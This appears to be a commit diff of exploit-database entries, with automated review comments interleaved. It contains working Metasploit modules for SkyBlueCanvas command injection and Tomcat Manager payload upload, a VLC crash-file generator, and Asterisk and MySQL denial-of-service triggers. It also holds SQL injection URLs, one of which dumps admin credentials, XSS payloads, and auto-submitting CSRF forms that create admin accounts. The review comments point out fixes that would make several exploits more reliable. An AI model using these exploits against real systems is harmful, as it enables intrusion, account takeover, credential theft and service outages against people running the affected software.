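Review bot: same copy of the BID 28352 paragraph as 31445, including "A local file-include vulnerability" and "An arbitrary file-upload vulnerability", neither of which this file demonstrates; the PoC here is the dir=../../../../WINDOWS/system32/config/ directory listing through fileManager.jsp that the index row describes. A one-line pointer to 31445 for the getImportFileRedirect.jsp traversal would be more useful than repeating the same text in both files.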

platforms/linux/dos/31440.txt Executable file

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/28308/info
Asterisk is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers.
Exploiting these issues may allow an attacker to corrupt memory and cause denial-of-service conditions or potentially execute arbitrary code in the context of the application.
These issues affect the following versions:
Asterisk Open Source prior to 1.4.18.1 and 1.4.19-rc3.
Asterisk Open Source prior to 1.6.0-beta6
Asterisk Business Edition prior to C.1.6.1
AsteriskNOW prior to 1.0.2
Asterisk Appliance Developer Kit prior to Asterisk 1.4 revision 109386
s800i (Asterisk Appliance) prior to 1.1.0.2
Example invalid SDP payload (invalid RTP payload type is 780903144):
v=0
o=- 817933771 817933775 IN IP4 10.10.1.101
s=session-name
c=IN IP4 10.10.1.101
t=0 0
m=audio 5000 RTP/AVP 0
a=rtpmap:780903144 PCMU/8000
a=rtpmap:4 G723/8000/1
a=rtpmap:97 telephone-event/8000
Example SDP payload:
v=0
o=- 817933771 817933775 IN IP4 10.10.1.101
s=session-name
c=IN IP4 10.10.1.101
t=0 0
m=audio 5000 RTP/AVP 0
a=rtpmap:0 PCMU/8000
[... repeat this line ...]
a=rtpmap:4 G723/8000/1
a=rtpmap:97 telephone-event/8000
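Review bot: the second SDP example says "[... repeat this line ...]" for "a=rtpmap:0 PCMU/8000" without giving a count, so a reader cannot tell how many repetitions are needed to overrun the buffer; state the number if it is known, or say that it is not. The first example is self-contained (the out-of-range payload type 780903144 in the a=rtpmap line is the whole trigger, as the preceding sentence says) and is the one worth leading with.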

platforms/linux/dos/31444.txt Executable file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/28351/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be done through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
This issue affects versions prior to MySQL 5.0.32 and 5.1.14.
1.
REATE OR REPLACE VIEW test_view AS
SELECT
table_schema AS object_schema
,table_name AS object_name
,table_type AS object_type
FROM information_schema.tables
ORDER BY object_schema;
EXPLAIN SELECT * FROM test_view;
2.
explain select * from (select table_name from information_schema.tables ) AS a;
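Review bot: the first statement is missing its leading character: "REATE OR REPLACE VIEW test_view AS" should be "CREATE OR REPLACE VIEW test_view AS", and as pasted the first trigger will not parse. The rest is consistent: both triggers are EXPLAIN over a SELECT from information_schema.tables, which lines up with the note that the attacker only needs to be able to run SELECT statements.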

platforms/linux/remote/31432.rb Executable file

@ -0,0 +1,94 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'SkyBlueCanvas CMS Remote Code Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability
in SkyBlueCanvas CMS version 1.1 r248-03 and below.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Scott Parish', # Vulnerability discovery and exploit
'xistence <xistence[at]0x90.nl>' # Metasploit Module
],
'References' =>
[
['CVE', '2014-1683'],
['OSVDB', '102586'],
['BID', '65129'],
['EDB', '31183'],
['URL', 'http://packetstormsecurity.com/files/124948/SkyBlueCanvas-CMS-1.1-r248-03-Command-Injection.html']
],
'Privileged' => false,
'Payload' =>
{
# Arbitrary big number. The payload gets sent as an HTTP
# response body, so really it's unlimited
'Space' => 262144, # 256k
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python'
}
},
'Platform' => %w{ unix },
'Targets' =>
[
['SkyBlueCanvas 1.1 r248', {}]
],
'Arch' => ARCH_CMD,
'DisclosureDate' => 'Jan 28 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]),
],self.class)
end
def check
uri = normalize_uri(target_uri.path.to_s, "index.php")
res = send_request_raw('uri' => uri)
if res and res.body =~ /[1.1 r248]/
vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found")
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path.to_s, "index.php")
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_get' => { 'pid' => '4' },
'vars_post' =>
{
'cid' => '3',
'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
'email' => rand_text_alphanumeric(10),
'subject' => rand_text_alphanumeric(10),
'message' => rand_text_alphanumeric(10),
'action' => 'Send'
}
})
end
end
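Review bot: The fingerprint check `if res and res.body =~ /[1.1 r248]/` is a character class, not a literal string: it matches any single character from the set `1`, `.`, space, `r`, `2`, `4`, `8`, so almost any response body returns `CheckCode::Appears` and the check reports false positives on unaffected hosts. The intended pattern is `/1\.1 r248/`. Minor: the header comment `http//metasploit.com/download` is missing the colon after the scheme.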

55
platforms/multiple/dos/31429.py Executable file

@ -0,0 +1,55 @@
#!/usr/bin/python
# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer
# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size
# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2
# to run this script you need to install python bitstring module
# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc
import sys
from bitstring import BitArray
f = open(sys.argv[1],'r+b')
f.seek(0,2)
size = f.tell()
print "[*] file size: %d" % size
f.seek(0,0)
print "[*] ReeeeeWWWWWWiiiiiNNNNNNND"
fb = BitArray(f)
index = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True)
print "[*] found file properties GUID"
print "[*] File properties GUID: %s" % fb[index[0]:(index[0]+128)]
# index of minumum packet size in File Proprties header
i_min_data_pkt_size = index[0] + 736
print "[*] Original Minimum Data Packet Size: %s" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex
print "[*] Original Maximum Data Packet Size: %s" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex
# Accroding to ASF standarad the minimum data size and the maximum data size should be equal
print "[*] Changing Miniumum and Maximum Data packet size to 0"
# changing the data packets in bit array
fb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00
fb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00
fb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00
fb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00
fb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00
fb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00
fb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00
fb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00
print "[*] POC File Created poc.asf"
of = open('poc.asf','w+b')
fb.tofile(of)
of.close()
f.close()
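Review bot: `index = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True)` returns an empty tuple when the File Properties GUID is absent, so `i_min_data_pkt_size = index[0] + 736` raises an IndexError on any non-ASF input instead of a clear message; add `if not index: sys.exit('[-] File Properties object not found')` before the offset is computed. The magic offset `736` also needs a comment: it is 92 bytes (the fixed fields from Object ID through Flags in the File Properties Object) from the start of the GUID, i.e. the Minimum Data Packet Size field, which is what the following print statements assume. The eight byte-wise slice assignments could be a single `fb[i_min_data_pkt_size:i_min_data_pkt_size+64] = 0`, and the input is opened with `r+b` although it is never written to; `rb` is enough.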


@ -0,0 +1,426 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
CSRF_VAR = 'CSRF_NONCE='
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
'Description' => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
containing a jsp application using a POST request against the /manager/html/upload
component.
NOTE: The compatible payload sets vary based on the selected target. For
example, you must select the Windows target to use native Windows payloads.
},
'Author' => 'rangercha',
'License' => MSF_LICENSE,
'References' =>
[
# This is based on jduck's tomcat_mgr_deploy.
# the tomcat_mgr_deploy o longer works for current versions of tomcat due to
# CSRF protection tokens. Also PUT requests against the /manager/html/deploy
# aren't allowed anymore.
# There is no single vulnerability associated with deployment functionality.
# Instead, the focus has been on insecure/blank/hardcoded default passwords.
# The following references refer to HP Operations Manager
['CVE', '2009-3843'],
['OSVDB', '60317'],
['CVE', '2009-4189'],
['OSVDB', '60670'],
# HP Operations Dashboard
['CVE', '2009-4188'],
# IBM Cognos Express Default user/pass
['BID', '38084'],
['CVE', '2010-0557'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
# IBM Rational Quality Manager and Test Lab Manager
['CVE', '2010-4094'],
['ZDI', '10-214'],
# 'admin' password is blank in default Windows installer
['CVE', '2009-3548'],
['OSVDB', '60176'],
['BID', '36954'],
# tomcat docs
['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
],
'Platform' => %w{ java linux win }, # others?
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 09 2009'))
register_options(
[
OptString.new('USERNAME', [false, 'The username to authenticate as']),
OptString.new('PASSWORD', [false, 'The password for the specified username']),
# /cognos_express/manager/ for Cognos Express (19300)
OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
], self.class)
end
def check
res = query_manager
disconnect
return CheckCode::Unknown if res.nil?
if res.code.between?(400, 499)
vprint_error("#{peer} - Server rejected the credentials")
return CheckCode::Unknown
end
return CheckCode::Safe unless res.code == 200
# if res.code == 200
# there should be access to the Tomcat Manager and to the status page
res = query_status
return CheckCode::Unknown unless res
plat = detect_platform(res.body)
arch = detect_arch(res.body)
return CheckCode::Unknown unless plat and arch
vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture")
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
return CheckCode::Appears
end
def exploit
@app_base = rand_text_alphanumeric(4 + rand(32 - 4))
@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
#
# Find the session ID and the CSRF token
#
print_status("#{peer} - Retrieving session ID and CSRF token...")
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Upload Payload
#
print_status("#{peer} - Uploading and deploying #{@app_base}...")
if upload_payload
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
else
fail_with(Failure::Unknown, "Upload failed")
end
#
# Execute Payload
#
print_status("#{peer} - Executing #{@app_base}...")
unless execute_payload
fail_with(Failure::Unknown, "Failed to execute the payload")
end
#
# Get the new CSRF token & session id
#
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Delete the deployed payload
#
print_status("#{peer} - Undeploying #{@app_base} ...")
unless undeploy_app
print_warning("#{peer} - Failed to undeploy #{@app_base}...")
end
end
def query_status
path = normalize_uri(target_uri.path.to_s, 'status')
res = send_request_raw('uri' => path)
unless res and res.code == 200
vprint_error("Failed: Error requesting #{path}")
return nil
end
return res
end
def query_manager
path = normalize_uri(target_uri.path.to_s, '/html')
res = send_request_raw('uri' => path)
return res
end
def vars_get
vars = {}
unless @csrf_token.nil?
vars = {
"path" => @app_base,
"org.apache.catalina.filters.CSRF_NONCE" => @csrf_token
}
end
return vars
end
def detect_platform(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Name/
if i == 9 or i == 11
if ln.include? "Windows"
return 'win'
elsif ln.include? "Linux"
return 'linux'
elsif i==11
return 'unknown'
end
end
i = i+1 if i > 0
end
end
def detect_arch(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Architecture/
if i==9 or i==11
if ln.include? 'x86'
return ARCH_X86
elsif ln.include? 'i386'
return ARCH_X86
elsif ln.include? 'i686'
return ARCH_X86
elsif ln.include? 'x86_64'
return ARCH_X86
elsif ln.include? 'amd64'
return ARCH_X86
elsif i==11
return 'unknown'
end
end
i = i + 1 if i > 0
end
end
def find_csrf(res = nil)
return "" if res.blank?
vprint_status("#{peer} - Finding CSRF token...")
body = res.body
body.each_line do |ln|
ln.chomp!
csrf_nonce = ln.index(CSRF_VAR)
next if csrf_nonce.nil?
token = ln[csrf_nonce + CSRF_VAR.length, 32]
return token
end
return ""
end
def generate_multipart_msg(boundary, data)
# Rex::MIME::Message is breaking the binary upload when trying to
# enforce CRLF for SMTP compatibility
war_multipart = "-----------------------------"
war_multipart << boundary
war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
war_multipart << @app_base
war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
war_multipart << data
war_multipart << "\r\n-----------------------------"
war_multipart << boundary
war_multipart << "--\r\n"
end
def war_payload
payload.encoded_war({
:app_name => @app_base,
:jsp_name => @jsp_name,
:arch => target.arch,
:platform => target.platform
}).to_s
end
def send_war_payload(url, war)
boundary_identifier = rand_text_numeric(28)
res = send_request_cgi({
'uri' => url,
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id,
'vars_get' => vars_get,
'data' => generate_multipart_msg(boundary_identifier, war),
})
return res
end
def send_request_undeploy(url)
res = send_request_cgi({
'uri' => url,
'vars_get' => vars_get,
'method' => 'POST',
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id
})
return res
end
def access_manager?
res = query_manager
return false unless res and res.code == 200
@session_id = res.get_cookies
@csrf_token = find_csrf(res)
return true
end
def upload_payload
war = war_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
return parse_upload_response(res)
end
def parse_upload_response(res)
unless res
vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")
return false
end
if res.code < 200 or res.code >= 300
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
return false
end
return true
end
def execute_payload
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")
vprint_status("#{peer} - Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
return parse_execute_response(res)
end
def parse_execute_response(res)
unless res
vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]")
return false
end
return true
end
def undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")
res = send_request_undeploy(undeploy_url)
unless res
vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
return false
end
return true
end
end
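Review bot: `parse_upload_response` references `upload_path` in `vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")` and again in the non-2xx branch, but `upload_path` is a local of `upload_payload` and is not in scope here, so every failed upload raises NameError instead of printing the intended message; pass the path in as a parameter. Both `report_auth_info` calls use `datastore['PATH']`, but no `PATH` option is registered (the option is `TARGETURI`), so the recorded proof string always carries an empty path. In `check`, `res.code.between?(400, 499)` treats a 404 (manager app not present) as "Server rejected the credentials", which misreports the finding; handle 401/403 separately from 404. Minor: the header comment `http//metasploit.com/download` is missing the colon, and "the tomcat_mgr_deploy o longer works" should read "no longer".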


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28291/info
The 'phpstats' program is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects phpstats 0.1_alpha.
http://www.example.com/phpstats/phpstats.php?baseDir=<script>alert(1)</script>&mode=run

11
platforms/php/webapps/31415.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28293/info
eForum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
These issues affect eForum 0.4; other versions may also be affected.
http://www.example.com/eForum/busca.php
http://www.example.com/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E&busca=%3Cscript%3Ealert(2)%3C/script%3E
http://www.example.com/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E
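Review bot: The first PoC URL `http://www.example.com/eForum/busca.php` carries no parameters and demonstrates nothing; the entry should name the affected parameters (`link` and `busca`, as the second URL shows) and state whether a fixed version exists, since "other versions may also be affected" leaves a reader without a patch target.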


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28294/info
webSPELL is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
webSPELL 4.01.02 is vulnerable; other versions may also be affected.
http://www.example.com/path/index.php?site=forum&board=">[XSS]

91
platforms/php/webapps/31418.txt Executable file

@ -0,0 +1,91 @@
Jobsite logo - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/jobfinder/
####################################################################
VULNERABILITY
##############
/includes/reg.php (line 4-28)
$user=addslashes($_POST['user']);
$pass=addslashes($_POST['user_password']);
$email=$_POST['email'];
$pass2=addslashes($_POST['user_password2']);
$firstname=addslashes($_POST['firstname']);
$lastname=addslashes($_POST['lastname']);
$middlename=addslashes($_POST['middlename']);
$title=addslashes($_POST['title']);
$address=addslashes($_POST['address']);
$city=addslashes($_POST['city']);
if(isset($user) && isset($pass))
{
$email=addslashes($email);
if($pass2!=$pass)
{
echo "<script type='text/javascript'>javascript:alert('Passwords
doesnt match.');</script>";
exit;
}
$connection = new db();
$connection->connect();
$result = mysql_query("SELECT username FROM mobagi_".$title." WHERE
username='".$user."' ")or die (mysql_error());
#########
EXPLOIT
#########
[1] Post Sql Injection
======================
Note: enter the registration page[register.php] and register there , then
take the post code
POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
title=[SQL
INJECTION]&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register
[2] Post Cross Site Scripting
===============================
POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
title=<script>alert(document.cookie);</script>&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register
####################################################################
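Review bot: The snippet does not spell out why `title` is injectable: `addslashes()` is applied to `$title`, but it is then concatenated into the table name in `"SELECT username FROM mobagi_".$title." WHERE`, an unquoted context in which addslashes gives no protection. The advisory should say so, because the correct fix is a whitelist of permitted `title` values, not more escaping. Both request captures keep `Content-Length: 122` from the original request, which will not match the modified bodies, and entry [2] does not identify where `title` is echoed back, so the XSS cannot be verified from the quoted code. Minor: "Vulnerabilties" in the title.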

66
platforms/php/webapps/31419.txt Executable file

@ -0,0 +1,66 @@
TopicsViewer v3.0 Beta 1 - Multiple Sql Injection Vulnerabilty
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.topicsviewer.com/
####################################################################
Multiple Sql Injection
======================
VULNERABILITY
##############
[I] /admincp/edit_block.php (line 46-48)
$sql_b_e = "select * from blocks where b_id = $_GET[id] ";
$result_b_e = @mysql_query ($sql_b_e);
$block = @mysql_fetch_array ($result_b_e);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_block.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10
VULNERABILITY
##############
[II] /admincp/edit_cat.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_cat.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8
VULNERABILITY
##############
[III] /admincp/edit_note.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_note.php?id=1+and+1=2+union+select+1,version(),3,4,5
VULNERABILITY
##############
[V] /admincp/rmv_topic.php (line 46-47)
$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";
$result = @mysql_query ($sql);
#########
EXPLOIT
#########
localhost/Path/admincp/rmv_topic.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14
####################################################################
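Review bot: Entry [III] for `/admincp/edit_note.php` repeats entry [II] verbatim (`$sql = "select * from cat where c_id = $_GET[id]";`), which is the edit_cat.php query; either the snippet was pasted from the wrong file or the line reference (77-79) is wrong. The numbering also skips from [III] to [V]. The common root cause across all four entries is `$_GET[id]` interpolated into the query as an unquoted integer, so the fix is an `(int)` cast or a bound parameter rather than string escaping; the advisory names no fixed version.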

53
platforms/php/webapps/31420.txt Executable file

@ -0,0 +1,53 @@
Eventy Online Scheduler V1.8 - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script :
http://calendarscripts.info/event-calendar-software.html
.:. Dork : "Powered by CalendarScripts.info"
####################################################################
[1] Sql Injection
==================
VULNERABILITY
##############
/eve_event.php (line 15-16)
$query="SELECT * FROM $T_EVENTS WHERE id=".$_GET['id'];
$event=$DB->sq($query);
#########
EXPLOIT
#########
http://site/eve_event.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+evp_admin
[2] Cross Site Scripting
=========================
http://site/eventy.php?next=1&selmonth=January&selyear=2014'"()%26%25<ScRiPt
>prompt(document.cookie)</ScRiPt>
[3] Cross Site Request Forgery
==============================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/a_admins.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="pass" value="admin"/>
<input type="hidden" name="add" value="1"/>
</form>
</body>
</html>
####################################################################
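Review bot: The SQL injection entry shows its cause (`$query="SELECT * FROM $T_EVENTS WHERE id=".$_GET['id'];`, an unquoted integer context, so the fix is an `intval()` cast or a bound parameter), but the XSS and CSRF entries give no file or line reference, so a maintainer cannot locate the sink or the missing token check. The XSS PoC URL ending in `selyear=2014'"()%26%25<ScRiPt` is wrapped across two lines and should be on one line. Minor: "Vulnerabilties" in the title.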

50
platforms/php/webapps/31421.txt Executable file

@ -0,0 +1,50 @@
Booking Calendar PHP - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.sajt-trgovina.com/booking_calendar/
####################################################################
[1] Multiple Sql Injection
===========================
http://site/calendare/get_code.php?id=null'+and+1=2+union+select+1,2,version(),4,5,6---
http://site/calendare/read_answer.php?id=null+and+1=2+union+select+1,2,3,4,5,6,version(),8,9,10
http://site/calendare/edit_calendar.php?id=null'+and+1=2+union+select+1,version(),3,4,5,6---
[2] Cross Site Scripting
=========================
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/">
<input type="hidden" name="id_template" value="2"/>
<input type="hidden" name="name"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="save_new_calendar" value="Save new calendar"/>
</form>
</body>
</html>
[3] Cross Site Request Forgery
==============================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/user_add.php
">
<input type="hidden" name="name" value="iphobos"/>
<input type="hidden" name="email" value="email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="user_add" value="Save changes"/>
</form>
</body>
</html>
####################################################################
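Review bot: Section [2] is labelled "Cross Site Scripting" but the PoC is an auto-submitting POST form to `http://site/calendare/` that saves a calendar whose `name` contains script, i.e. a stored XSS delivered by a CSRF request; the label should say so, and the entry should name the file and line of the unescaped output. The `action` URL of the [3] form is split across two lines (`user_add.php` / `">`), which breaks the markup as pasted. Unlike the other advisories by this author in the commit, none of the three entries names an affected version, a fix, or a vulnerable code snippet for the SQL injection URLs.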

61
platforms/php/webapps/31426.txt Executable file

@ -0,0 +1,61 @@
# Exploit Title: Multiply vulnerabilites in plogger 1.0 (RC1)
# Date: 03/02/2014
# Exploit Author: killall-9@mail.com
# Vendor Homepage: http://www.plogger.org/
# Software Link: http://www.plogger.org/download/
# Version: 1.0 (RC1)
# Tested on: Virtualbox (debian) and Apache
REFLECTED XSS:
1) http://localhost/plogger-1.0RC1/?jump-menu=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22
2) http://localhost/plogger-1.0RC1/plog-admin/index.php?loginerror&r=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22
------------------------------------------------------
STORED XSS: (must be logged in)
1)
POST /plogger-1.0RC1/plog-admin/plog-manage.php?level=albums&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/plogger-1.0RC1/plog-admin/plog-manage.php?action=edit-album&id=1
Cookie: PHPSESSID=sjjl1sqlt8ceuo5upt6p9jfsf1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
name=Plogger%2BTest%2BAlbum&description=%3Cscript%3Ealert%28%22css+here%22%29%3B%3C%2Fscript%3E&thumbnail_id=4&pid=1&action=update-album&update=Update
(In the description field it's possible to store javascript code)
------------------------------------------------------
CSRF:
1)
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html lang="en">
<head>
<title>Pinata-CSRF-Tool</title>
</head>
<body>
<form action="http://localhost/plogger-1.0RC1/plog-admin/plog-manage.php?level=albums&id=1" id="formid" method="post">
<input name="name" value="Plogger+Test+Album" />
<input name="description" value="Feel+free+to+ownz+it+" />
<input name="thumbnail_id" value="0" />
<input name="pid" value="1" />
<input name="action" value="update-album" />
<input name="update" value="Update" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
chherZ.
